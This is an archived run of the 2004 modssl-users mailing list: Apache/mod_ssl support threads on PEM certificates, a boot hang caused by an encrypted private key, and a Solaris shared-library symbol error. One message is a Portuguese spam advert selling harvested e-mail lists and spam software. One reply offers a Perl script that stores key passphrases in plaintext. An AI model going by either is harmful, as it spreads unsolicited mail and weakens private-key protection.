	id B6F72A8978; Sun, 18 Apr 2004 08:45:26 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rwcrmhc11.comcast.net (rwcrmhc11.comcast.net [204.127.198.35])
	by master.modssl.org (Postfix) with ESMTP id 6D0DDA8933
	for ; Sun, 18 Apr 2004 08:45:07 +0200 (CEST)
Received: from compnick (pcp03144331pcs.midval01.tn.comcast.net[68.59.247.15])
          by comcast.net (rwcrmhc11) with SMTP
          id <2004041806445801300fceone>; Sun, 18 Apr 2004 06:44:58 +0000
From: "Linux Nick" 
To: 
Subject: RE: SSL certs
Date: Sun, 18 Apr 2004 02:44:44 -0400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_00BB_01C424EF.1BABE3D0"
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
In-Reply-To: <20040418042633.243A7A893B@master.modssl.org>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Thread-Index: AcQk/UWjQrvl8iNFQeiA6h5D4x+IHgAEu60g
Message-Id: <20040418064507.6D0DDA8933@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Linux Nick" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_00BB_01C424EF.1BABE3D0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit

Ok I think I have my certs I have a server.csr and .key file and a ca.crt
and ca.key, how do I get them into PEM format that its always talking about?
By them I mean http://www.modssl.org/docs/2.8/ssl_faq.html#cert-ownca 

 

  _____  

From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
On Behalf Of Linux Nick
Sent: Sunday, April 18, 2004 12:26 AM
To: modssl-users@modssl.org
Subject: SSL certs

 

Does anyone know of an easy way to create ssl certs and keys in debian? Im
having a time with it.

 

 

Nick

 


------=_NextPart_000_00BB_01C424EF.1BABE3D0
Content-Type: text/html;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable


















Ok I think I have my certs I have a
server.csr and .key file and a ca.crt and ca.key, how do I get them into =
PEM
format that its always talking about? By them I mean http://ww=
w.modssl.org/docs/2.8/ssl_faq.html#cert-ownca




 


















From: =
owner-modssl-users@modssl.org =
[mailto:owner-modssl-users@modssl.org] On Behalf Of Linux Nick

Sent: Sunday, April 18, =
2004 12:26
AM

To: modssl-users@modssl.org

Subject: SSL =
certs






 



Does anyone know of an easy way to create ssl certs =
and keys
in debian? Im having a time with it.



 



 



Nick



 












------=_NextPart_000_00BB_01C424EF.1BABE3D0--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 20 15:40:25 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 62383A8963; Tue, 20 Apr 2004 15:40:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (bay15-f11.bay15.hotmail.com [65.54.185.11])
	by master.modssl.org (Postfix) with ESMTP id D8531A8938
	for ; Tue, 20 Apr 2004 15:40:08 +0200 (CEST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Tue, 20 Apr 2004 06:40:00 -0700
Received: from 128.240.229.67 by by15fd.bay15.hotmail.msn.com with HTTP;
	Tue, 20 Apr 2004 13:39:59 GMT
X-Originating-IP: [128.240.229.67]
X-Originating-Email: [csgcsg39@hotmail.com]
X-Sender: csgcsg39@hotmail.com
From: "C G" 
To: modssl-users@modssl.org
Subject: mod ssl freezes when booting up
Date: Tue, 20 Apr 2004 13:39:59 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 20 Apr 2004 13:40:00.0165 (UTC) FILETIME=[F9F7E550:01C426DC]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "C G" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Dear All,

If I restart my computer, the screen always freezes at 'starting up apache' 
and I have to remote log on and kill apache for the machine to boot.

Looking at the error log I get the messages:
[Tue Apr 20 13:58:06 2004] [error] mod_ssl: Init: Private key not found 
(OpenSSL library error follows)
[Tue Apr 20 13:58:06 2004] [error] OpenSSL: error:0D094068:asn1 encoding 
routines:d2i_ASN1_SET:bad tag
[Tue Apr 20 13:58:06 2004] [error] OpenSSL: error:0D0680A8:asn1 encoding 
routines:ASN1_CHECK_TLEN:wrong tag
[Tue Apr 20 13:58:06 2004] [error] OpenSSL: error:0D07803A:asn1 encoding 
routines:ASN1_ITEM_EX_D2I:nested asn1 error
[Tue Apr 20 13:58:06 2004] [error] OpenSSL: error:0D09A00D:asn1 encoding 
routines:d2i_PrivateKey:ASN1 lib

However, what I don't understand is that I once logged in I can start apache 
up with no more errors, i.e.
apachectl configtest
apachectl start [Asks for password here]
there are no more errors in the logs either.

Any ideas?

Thanks

Colin

Versions:
libapache-mod-ssl 2.8.16-7
apache 1.3.29

Under Debian testing

_________________________________________________________________
Express yourself with cool emoticons - download MSN Messenger today! 
http://www.msn.co.uk/messenger

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 20 16:08:39 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D9DB5A8963; Tue, 20 Apr 2004 16:08:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sphinx.gsu.edu (sphinx.gsu.edu [131.96.2.23])
	by master.modssl.org (Postfix) with ESMTP id 274DDA898B
	for ; Tue, 20 Apr 2004 16:08:23 +0200 (CEST)
Received: from zim.gsu.edu (zim.gsu.edu [131.96.234.45])
	by sphinx.gsu.edu (8.11.7+Sun/8.10.2) with ESMTP id i3KE8B019429
	for ; Tue, 20 Apr 2004 10:08:11 -0400 (EDT)
Received: (from sysmda@localhost)
	by zim.gsu.edu (8.11.7p1+Sun/8.11.7) id i3KE8Bi22025
	for modssl-users@modssl.org; Tue, 20 Apr 2004 10:08:11 -0400 (EDT)
Date: Tue, 20 Apr 2004 10:08:11 -0400
From: Mike Alberghini 
To: modssl-users@modssl.org
Subject: Re: mod ssl freezes when booting up
Message-ID: <20040420140811.GA21872@zim.gsu.edu>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.2.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mike Alberghini 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Assuming that the box boots apache and you hand-start it both as root,
check variables like $PATH and $LD_LIBRARY_PATH, as well as the permissions
of the files containing your private key.


On Tue, Apr 20, 2004 at 01:39:59PM +0000, C G wrote:
> Dear All,
> 
> If I restart my computer, the screen always freezes at 'starting up apache' 
> and I have to remote log on and kill apache for the machine to boot.
> 
> Looking at the error log I get the messages:
> [Tue Apr 20 13:58:06 2004] [error] mod_ssl: Init: Private key not found 
> (OpenSSL library error follows)
> [Tue Apr 20 13:58:06 2004] [error] OpenSSL: error:0D094068:asn1 encoding 
> routines:d2i_ASN1_SET:bad tag
> [Tue Apr 20 13:58:06 2004] [error] OpenSSL: error:0D0680A8:asn1 encoding 
> routines:ASN1_CHECK_TLEN:wrong tag
> [Tue Apr 20 13:58:06 2004] [error] OpenSSL: error:0D07803A:asn1 encoding 
> routines:ASN1_ITEM_EX_D2I:nested asn1 error
> [Tue Apr 20 13:58:06 2004] [error] OpenSSL: error:0D09A00D:asn1 encoding 
> routines:d2i_PrivateKey:ASN1 lib
> 
> However, what I don't understand is that I once logged in I can start 
> apache up with no more errors, i.e.
> apachectl configtest
> apachectl start [Asks for password here]
> there are no more errors in the logs either.
> 
> Any ideas?
> 
> Thanks
> 
> Colin
> 
> Versions:
> libapache-mod-ssl 2.8.16-7
> apache 1.3.29
> 
> Under Debian testing
> 
> _________________________________________________________________
> Express yourself with cool emoticons - download MSN Messenger today! 
> http://www.msn.co.uk/messenger
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
Michael Alberghini
Software Systems Engineer
Georgia State University
mike@gsu.edu
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 20 16:33:59 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 67470A8943; Tue, 20 Apr 2004 16:33:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.thelinuxfix.com (rrcs-central-65-31-69-10.biz.rr.com [65.31.69.10])
	by master.modssl.org (Postfix) with ESMTP id E9D75A8938
	for ; Tue, 20 Apr 2004 16:33:42 +0200 (CEST)
Received: (qmail 6120 invoked from network); 20 Apr 2004 10:33:30 -0400
Received: from unknown (HELO webmail.thelinuxfix.com) (192.168.2.210)
  by 192.168.2.200 with SMTP; 20 Apr 2004 10:33:30 -0400
Received: from 12.19.128.172
        (SquirrelMail authenticated user bdowney@briandowney.net)
        by webmail.thelinuxfix.com with HTTP;
        Tue, 20 Apr 2004 10:33:30 -0400 (EDT)
Message-ID: <51948.12.19.128.172.1082471610.squirrel@webmail.thelinuxfix.com>
Date: Tue, 20 Apr 2004 10:33:30 -0400 (EDT)
Subject: ssl_expr_yylex
From: "Brian Downey" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.2
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Brian Downey" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Howdy Folks!

Having a strange problem starting Apache/mod_ssl that I haven't been able
to find a resolution for; using the usual methods (Google, FAQ, list
searches, etc.)

First, here's the platform:

Solaris 9 (clean install)
Apache 1.3.29
OpenSSL 0.9.7d
mod_ssl-2.8.16-1.3.29
gcc 3.3.2
make 3.80


Anyway I removed any and all the pre-compiled Sun packages for the above,
and instead am compiling everything from source.  The first attempt I
tried on my own (I'm a Linux vet, no compiler fears), and then after I ran
into the error I started over from scratch using this document:

http://64.233.167.104/search?q=cache:olbQI85yCAoJ:ampubsvc.com/~meljr/AMPS.html+installing+apache+mod_ssl+on+solaris&hl=en&ie=UTF-8


Either way the problem is starting Apache using `apachectl startssl`, or
even `apachectl start` httpd pukes and spits this message out:

lolaweb1# ./apachectl startssl
Syntax error on line 206 of /export/apps/apache/conf/httpd.conf:
Cannot load /export/apps/apache/libexec/libssl.so into server: ld.so.1:
/export/apps/apache/bin/httpd: fatal: relocation error: file
/export/apps/apache/libexec/libssl.so: symbol ssl_expr_yylex: referenced
symbol not found
./apachectl startssl: httpd could not be started

Line 206 is the LoadModule line for mod_ssl:
LoadModule ssl_module         libexec/libssl.so

Looking at the symbol that was being referenced, I figured it was a flex
thing, so I installed flex 2.5.31, but to no avail.

I'm lost so far, as searching for that specific symbol isn't getting me
anywhere.

Could someone kindly point me in the right direction?
Thanks!!
- -brian

[=--------------------------------------------->
[ GPG public key ID 1EA8096A @ http://pgp.mit.edu
[=------------------------------------>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFAhTS6mNhQdx6oCWoRAoGuAJ4tXwKiF08QJY/tV8+Obil/QYcSGACfWhwS
26SHLVRYAS1c5iiVTWyUL7o=
=Db4G
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 20 16:46:41 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 75282A8943; Tue, 20 Apr 2004 16:46:41 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.thelinuxfix.com (rrcs-central-65-31-69-10.biz.rr.com [65.31.69.10])
	by master.modssl.org (Postfix) with ESMTP id E1020A8938
	for ; Tue, 20 Apr 2004 16:46:24 +0200 (CEST)
Received: (qmail 6629 invoked from network); 20 Apr 2004 10:46:14 -0400
Received: from unknown (HELO webmail.thelinuxfix.com) (192.168.2.210)
  by 192.168.2.200 with SMTP; 20 Apr 2004 10:46:14 -0400
Received: from 12.19.128.172
        (SquirrelMail authenticated user bdowney@briandowney.net)
        by webmail.thelinuxfix.com with HTTP;
        Tue, 20 Apr 2004 10:46:14 -0400 (EDT)
Message-ID: <25476.12.19.128.172.1082472374.squirrel@webmail.thelinuxfix.com>
In-Reply-To: <20040420143730.GA22712@zim.gsu.edu>
References: <51948.12.19.128.172.1082471610.squirrel@webmail.thelinuxfix.com>
    <20040420143730.GA22712@zim.gsu.edu>
Date: Tue, 20 Apr 2004 10:46:14 -0400 (EDT)
Subject: Re: ssl_expr_yylex
From: "Brian Downey" 
To: "Mike Alberghini" 
Cc: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.2
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Brian Downey" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hmm.

Here's the LD_LIBRARY_PATH environment I'm using.  Is libexec/ the correct
directory to reference?

LD_LIBRARY_PATH=/usr/local/ssl/lib:/usr/local/lib:/export/apps/apache/libexec

Thanks for your quick reply!
-brian

> Make sure the LD_LIBRARY_PATH includes the path to the apache
> files mentioned.
>
>
> On Tue, Apr 20, 2004 at 10:33:30AM -0400, Brian Downey wrote:
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>> Howdy Folks!
>>
>> Having a strange problem starting Apache/mod_ssl that I haven't been
>> able
>> to find a resolution for; using the usual methods (Google, FAQ, list
>> searches, etc.)
>>
>> First, here's the platform:
>>
>> Solaris 9 (clean install)
>> Apache 1.3.29
>> OpenSSL 0.9.7d
>> mod_ssl-2.8.16-1.3.29
>> gcc 3.3.2
>> make 3.80
>>
>>
>> Anyway I removed any and all the pre-compiled Sun packages for the
>> above,
>> and instead am compiling everything from source.  The first attempt I
>> tried on my own (I'm a Linux vet, no compiler fears), and then after I
>> ran
>> into the error I started over from scratch using this document:
>>
>> http://64.233.167.104/search?q=cache:olbQI85yCAoJ:ampubsvc.com/~meljr/AMPS.html+installing+apache+mod_ssl+on+solaris&hl=en&ie=UTF-8
>>
>>
>> Either way the problem is starting Apache using `apachectl startssl`, or
>> even `apachectl start` httpd pukes and spits this message out:
>>
>> lolaweb1# ./apachectl startssl
>> Syntax error on line 206 of /export/apps/apache/conf/httpd.conf:
>> Cannot load /export/apps/apache/libexec/libssl.so into server: ld.so.1:
>> /export/apps/apache/bin/httpd: fatal: relocation error: file
>> /export/apps/apache/libexec/libssl.so: symbol ssl_expr_yylex: referenced
>> symbol not found
>> ./apachectl startssl: httpd could not be started
>>
>> Line 206 is the LoadModule line for mod_ssl:
>> LoadModule ssl_module         libexec/libssl.so
>>
>> Looking at the symbol that was being referenced, I figured it was a flex
>> thing, so I installed flex 2.5.31, but to no avail.
>>
>> I'm lost so far, as searching for that specific symbol isn't getting me
>> anywhere.
>>
>> Could someone kindly point me in the right direction?
>> Thanks!!
>> - -brian
>>
>> [=--------------------------------------------->
>> [ GPG public key ID 1EA8096A @ http://pgp.mit.edu
>> [=------------------------------------>
>>
>> -----BEGIN PGP SIGNATURE-----
>> Version: GnuPG v1.2.4 (GNU/Linux)
>>
>> iD8DBQFAhTS6mNhQdx6oCWoRAoGuAJ4tXwKiF08QJY/tV8+Obil/QYcSGACfWhwS
>> 26SHLVRYAS1c5iiVTWyUL7o=
>> =Db4G
>> -----END PGP SIGNATURE-----
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>
> --
> Michael Alberghini
> Software Systems Engineer
> Georgia State University
> mike@gsu.edu
>


-brian

[=--------------------------------------------->
[ GPG public key ID 1EA8096A @ http://pgp.mit.edu
[=------------------------------------>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From jbanderas_23.86gd@mailcity.com  Tue Apr 20 22:34:19 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from mailcity.com (BA084234.user.veloxzone.com.br [200.217.84.234])
	by master.modssl.org (Postfix) with SMTP id 8A640A8938
	for ; Tue, 20 Apr 2004 22:34:02 +0200 (CEST)
From: "Julian Banderas" 
To: 
Subject: Mala direta e-mails listas de email http://www.gueb.de/divulgamail
Sender: "Julian Banderas" 
Mime-Version: 1.0
Content-Type: text/plain; charset="ISO-8859-1"
Date: Tue, 20 Apr 2004 17:34:14 -0300
Content-Transfer-Encoding: 8bit
Message-Id: <20040420203402.8A640A8938@master.modssl.org>

As melhores listas segmentadas de e-mails para mala direta. Todos os 
tipos:
http://www.gueb.de/divulgamail

Cadastros de e-mails segmentados por estados, profissões, empresas e 
pessoas físicas. Tudo que você pracisa para fazer a divulgação e 
publicidade do seu negócio, programas para spam e e-mail marketing. 
Listagens atualizadas e garantidas. Visite agora:
http://www.gueb.de/divulgamail

From owner-modssl-users@modssl.org  Wed Apr 21 09:03:36 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1F65FA8A4B; Wed, 21 Apr 2004 09:03:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id B3A40A8978
	for ; Wed, 21 Apr 2004 09:03:19 +0200 (CEST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.10/8.12.10) with ESMTP id i3L739sZ027648
	for ; Wed, 21 Apr 2004 09:03:09 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.10/8.12.10) with ESMTP id i3L739pI012152
	for ; Wed, 21 Apr 2004 09:03:09 +0200 (MEST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4927.1200
Subject: RE: mod ssl freezes when booting up
Date: Wed, 21 Apr 2004 09:03:08 +0200
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Importance: normal
Thread-Topic: mod ssl freezes when booting up
Thread-Index: AcQnBfjsx9+NgyXgQxu3FwCUxeva7gAaFN9g
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> -----Original Message-----
> From: C G [mailto:csgcsg39@hotmail.com]
>=20
> If I restart my computer, the screen always freezes at=20
> 'starting up apache'=20
> and I have to remote log on and kill apache for the machine to boot.

Is the private key encrypted? If it is, it will prompt for a passphrase
at start-up and wait until it gets one. But read on...

>=20
> Looking at the error log I get the messages:
> [Tue Apr 20 13:58:06 2004] [error] mod_ssl: Init: Private key=20
> not found=20

This isn't good. What do you have for SSLCertificateKeyFile? Does the
path exist? Is it readable?

Rgds,
Owen Boyle

Disclaimer: Any disclaimer attached to this message may be ignored.=20
Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat
keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Gruppe. =
This
e-mail is of a private and personal nature. It is not related to the
exchange or business activities of the SWX Group. Le pr=E9sent e-mail =
est
un message priv=E9 et personnel, sans rapport avec l'activit=E9 =
boursi=E8re du
Groupe SWX.


> (OpenSSL library error follows)
> [Tue Apr 20 13:58:06 2004] [error] OpenSSL:=20
> error:0D094068:asn1 encoding=20
> routines:d2i_ASN1_SET:bad tag
> [Tue Apr 20 13:58:06 2004] [error] OpenSSL:=20
> error:0D0680A8:asn1 encoding=20
> routines:ASN1_CHECK_TLEN:wrong tag
> [Tue Apr 20 13:58:06 2004] [error] OpenSSL:=20
> error:0D07803A:asn1 encoding=20
> routines:ASN1_ITEM_EX_D2I:nested asn1 error
> [Tue Apr 20 13:58:06 2004] [error] OpenSSL:=20
> error:0D09A00D:asn1 encoding=20
> routines:d2i_PrivateKey:ASN1 lib
>=20
> However, what I don't understand is that I once logged in I=20
> can start apache=20
> up with no more errors, i.e.
> apachectl configtest
> apachectl start [Asks for password here]
> there are no more errors in the logs either.
>=20
> Any ideas?
>=20
> Thanks
>=20
> Colin
>=20
> Versions:
> libapache-mod-ssl 2.8.16-7
> apache 1.3.29
>=20
> Under Debian testing
>=20
> _________________________________________________________________
> Express yourself with cool emoticons - download MSN Messenger today!=20
> http://www.msn.co.uk/messenger
>=20
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.=20


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 21 12:58:53 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B8EA6A8962; Wed, 21 Apr 2004 12:58:53 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (bay15-f58.bay15.hotmail.com [65.54.185.58])
	by master.modssl.org (Postfix) with ESMTP id 4D2C7A8933
	for ; Wed, 21 Apr 2004 12:58:37 +0200 (CEST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 21 Apr 2004 03:58:28 -0700
Received: from 128.240.229.7 by by15fd.bay15.hotmail.msn.com with HTTP;
	Wed, 21 Apr 2004 10:58:28 GMT
X-Originating-IP: [128.240.229.7]
X-Originating-Email: [csgcsg39@hotmail.com]
X-Sender: csgcsg39@hotmail.com
From: "C G" 
To: modssl-users@modssl.org
Subject: RE: mod ssl freezes when booting up
Date: Wed, 21 Apr 2004 10:58:28 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 21 Apr 2004 10:58:28.0500 (UTC) FILETIME=[93B2ED40:01C4278F]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "C G" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


> >
> > If I restart my computer, the screen always freezes at
> > 'starting up apache'
> > and I have to remote log on and kill apache for the machine to boot.
>
>Is the private key encrypted? If it is, it will prompt for a passphrase
>at start-up and wait until it gets one. But read on...
Yes the key the is encrypted. When I start apache as root and log on, it 
asks me for a pass phrase. But when apache tries to start at boot-up it just 
hangs, no pass-phrase.

> > Looking at the error log I get the messages:
> > [Tue Apr 20 13:58:06 2004] [error] mod_ssl: Init: Private key
> > not found
>
>This isn't good. What do you have for SSLCertificateKeyFile? Does the
>path exist? Is it readable?
Yes is there, and yes it is readable. I presume that apache will start up as 
root. So that shouldn't be the problem.

Someone else suggested that that I make apache boot-up last. I changed 
S90apache to  S99apache. It didn't work.

Another suggestion was to try $PATH and $LD_LIBRARY_PATH. I don't think this 
is the problem as everything is Debian, and I haven't put anything in funny 
positions.

Are there any other suggestions?

Thanks for the help

Colin

_________________________________________________________________
Find a cheaper internet access deal - choose one to suit you. 
http://www.msn.co.uk/internetaccess

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 21 13:17:59 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E6B22A8A4B; Wed, 21 Apr 2004 13:17:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web60703.mail.yahoo.com (web60703.mail.yahoo.com [216.109.117.226])
	by master.modssl.org (Postfix) with SMTP id 3CB33A8941
	for ; Wed, 21 Apr 2004 13:17:42 +0200 (CEST)
Message-ID: <20040421111733.86693.qmail@web60703.mail.yahoo.com>
Received: from [62.129.121.32] by web60703.mail.yahoo.com via HTTP; Wed, 21 Apr 2004 04:17:33 PDT
Date: Wed, 21 Apr 2004 04:17:33 -0700 (PDT)
From: Matt Stevenson 
Subject: RE: mod ssl freezes when booting up
To: modssl-users@modssl.org
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

You need to set apache up not to ask for a password.

look at ...

SSLPassPhraseDialog
exec:/usr/local/apache/bin/printkey.pl

where printkey.pl could be ...

#!/usr/bin/perl -w

my $passwords = {
                'x.com'            => 'pass1',
                'y.com'            => 'pass2'
                };

my $server = (split(/:/, $ARGV[0]))[0];

print "$passwords->{$server}\n";

Regards
Matt

--- C G  wrote:
> 
> > >
> > > If I restart my computer, the screen always
> freezes at
> > > 'starting up apache'
> > > and I have to remote log on and kill apache for
> the machine to boot.
> >
> >Is the private key encrypted? If it is, it will
> prompt for a passphrase
> >at start-up and wait until it gets one. But read
> on...
> Yes the key the is encrypted. When I start apache as
> root and log on, it 
> asks me for a pass phrase. But when apache tries to
> start at boot-up it just 
> hangs, no pass-phrase.
> 
> > > Looking at the error log I get the messages:
> > > [Tue Apr 20 13:58:06 2004] [error] mod_ssl:
> Init: Private key
> > > not found
> >
> >This isn't good. What do you have for
> SSLCertificateKeyFile? Does the
> >path exist? Is it readable?
> Yes is there, and yes it is readable. I presume that
> apache will start up as 
> root. So that shouldn't be the problem.
> 
> Someone else suggested that that I make apache
> boot-up last. I changed 
> S90apache to  S99apache. It didn't work.
> 
> Another suggestion was to try $PATH and
> $LD_LIBRARY_PATH. I don't think this 
> is the problem as everything is Debian, and I
> haven't put anything in funny 
> positions.
> 
> Are there any other suggestions?
> 
> Thanks for the help
> 
> Colin
> 
>
_________________________________________________________________
> Find a cheaper internet access deal - choose one to
> suit you. 
> http://www.msn.co.uk/internetaccess
> 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
majordomo@modssl.org



	
		
__________________________________
Do you Yahoo!?
Yahoo! Photos: High-quality 4x6 digital prints for 25¢
http://photos.yahoo.com/ph/print_splash
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 21 13:43:13 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 05F75A8962; Wed, 21 Apr 2004 13:43:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0a.swx.com (ns0a.swx.com [146.109.240.107])
	by master.modssl.org (Postfix) with ESMTP id A857DA8933
	for ; Wed, 21 Apr 2004 13:42:56 +0200 (CEST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0a.swx.com (8.12.10/8.12.10) with ESMTP id i3LBgmMX000123
	for ; Wed, 21 Apr 2004 13:42:48 +0200 (MEST)
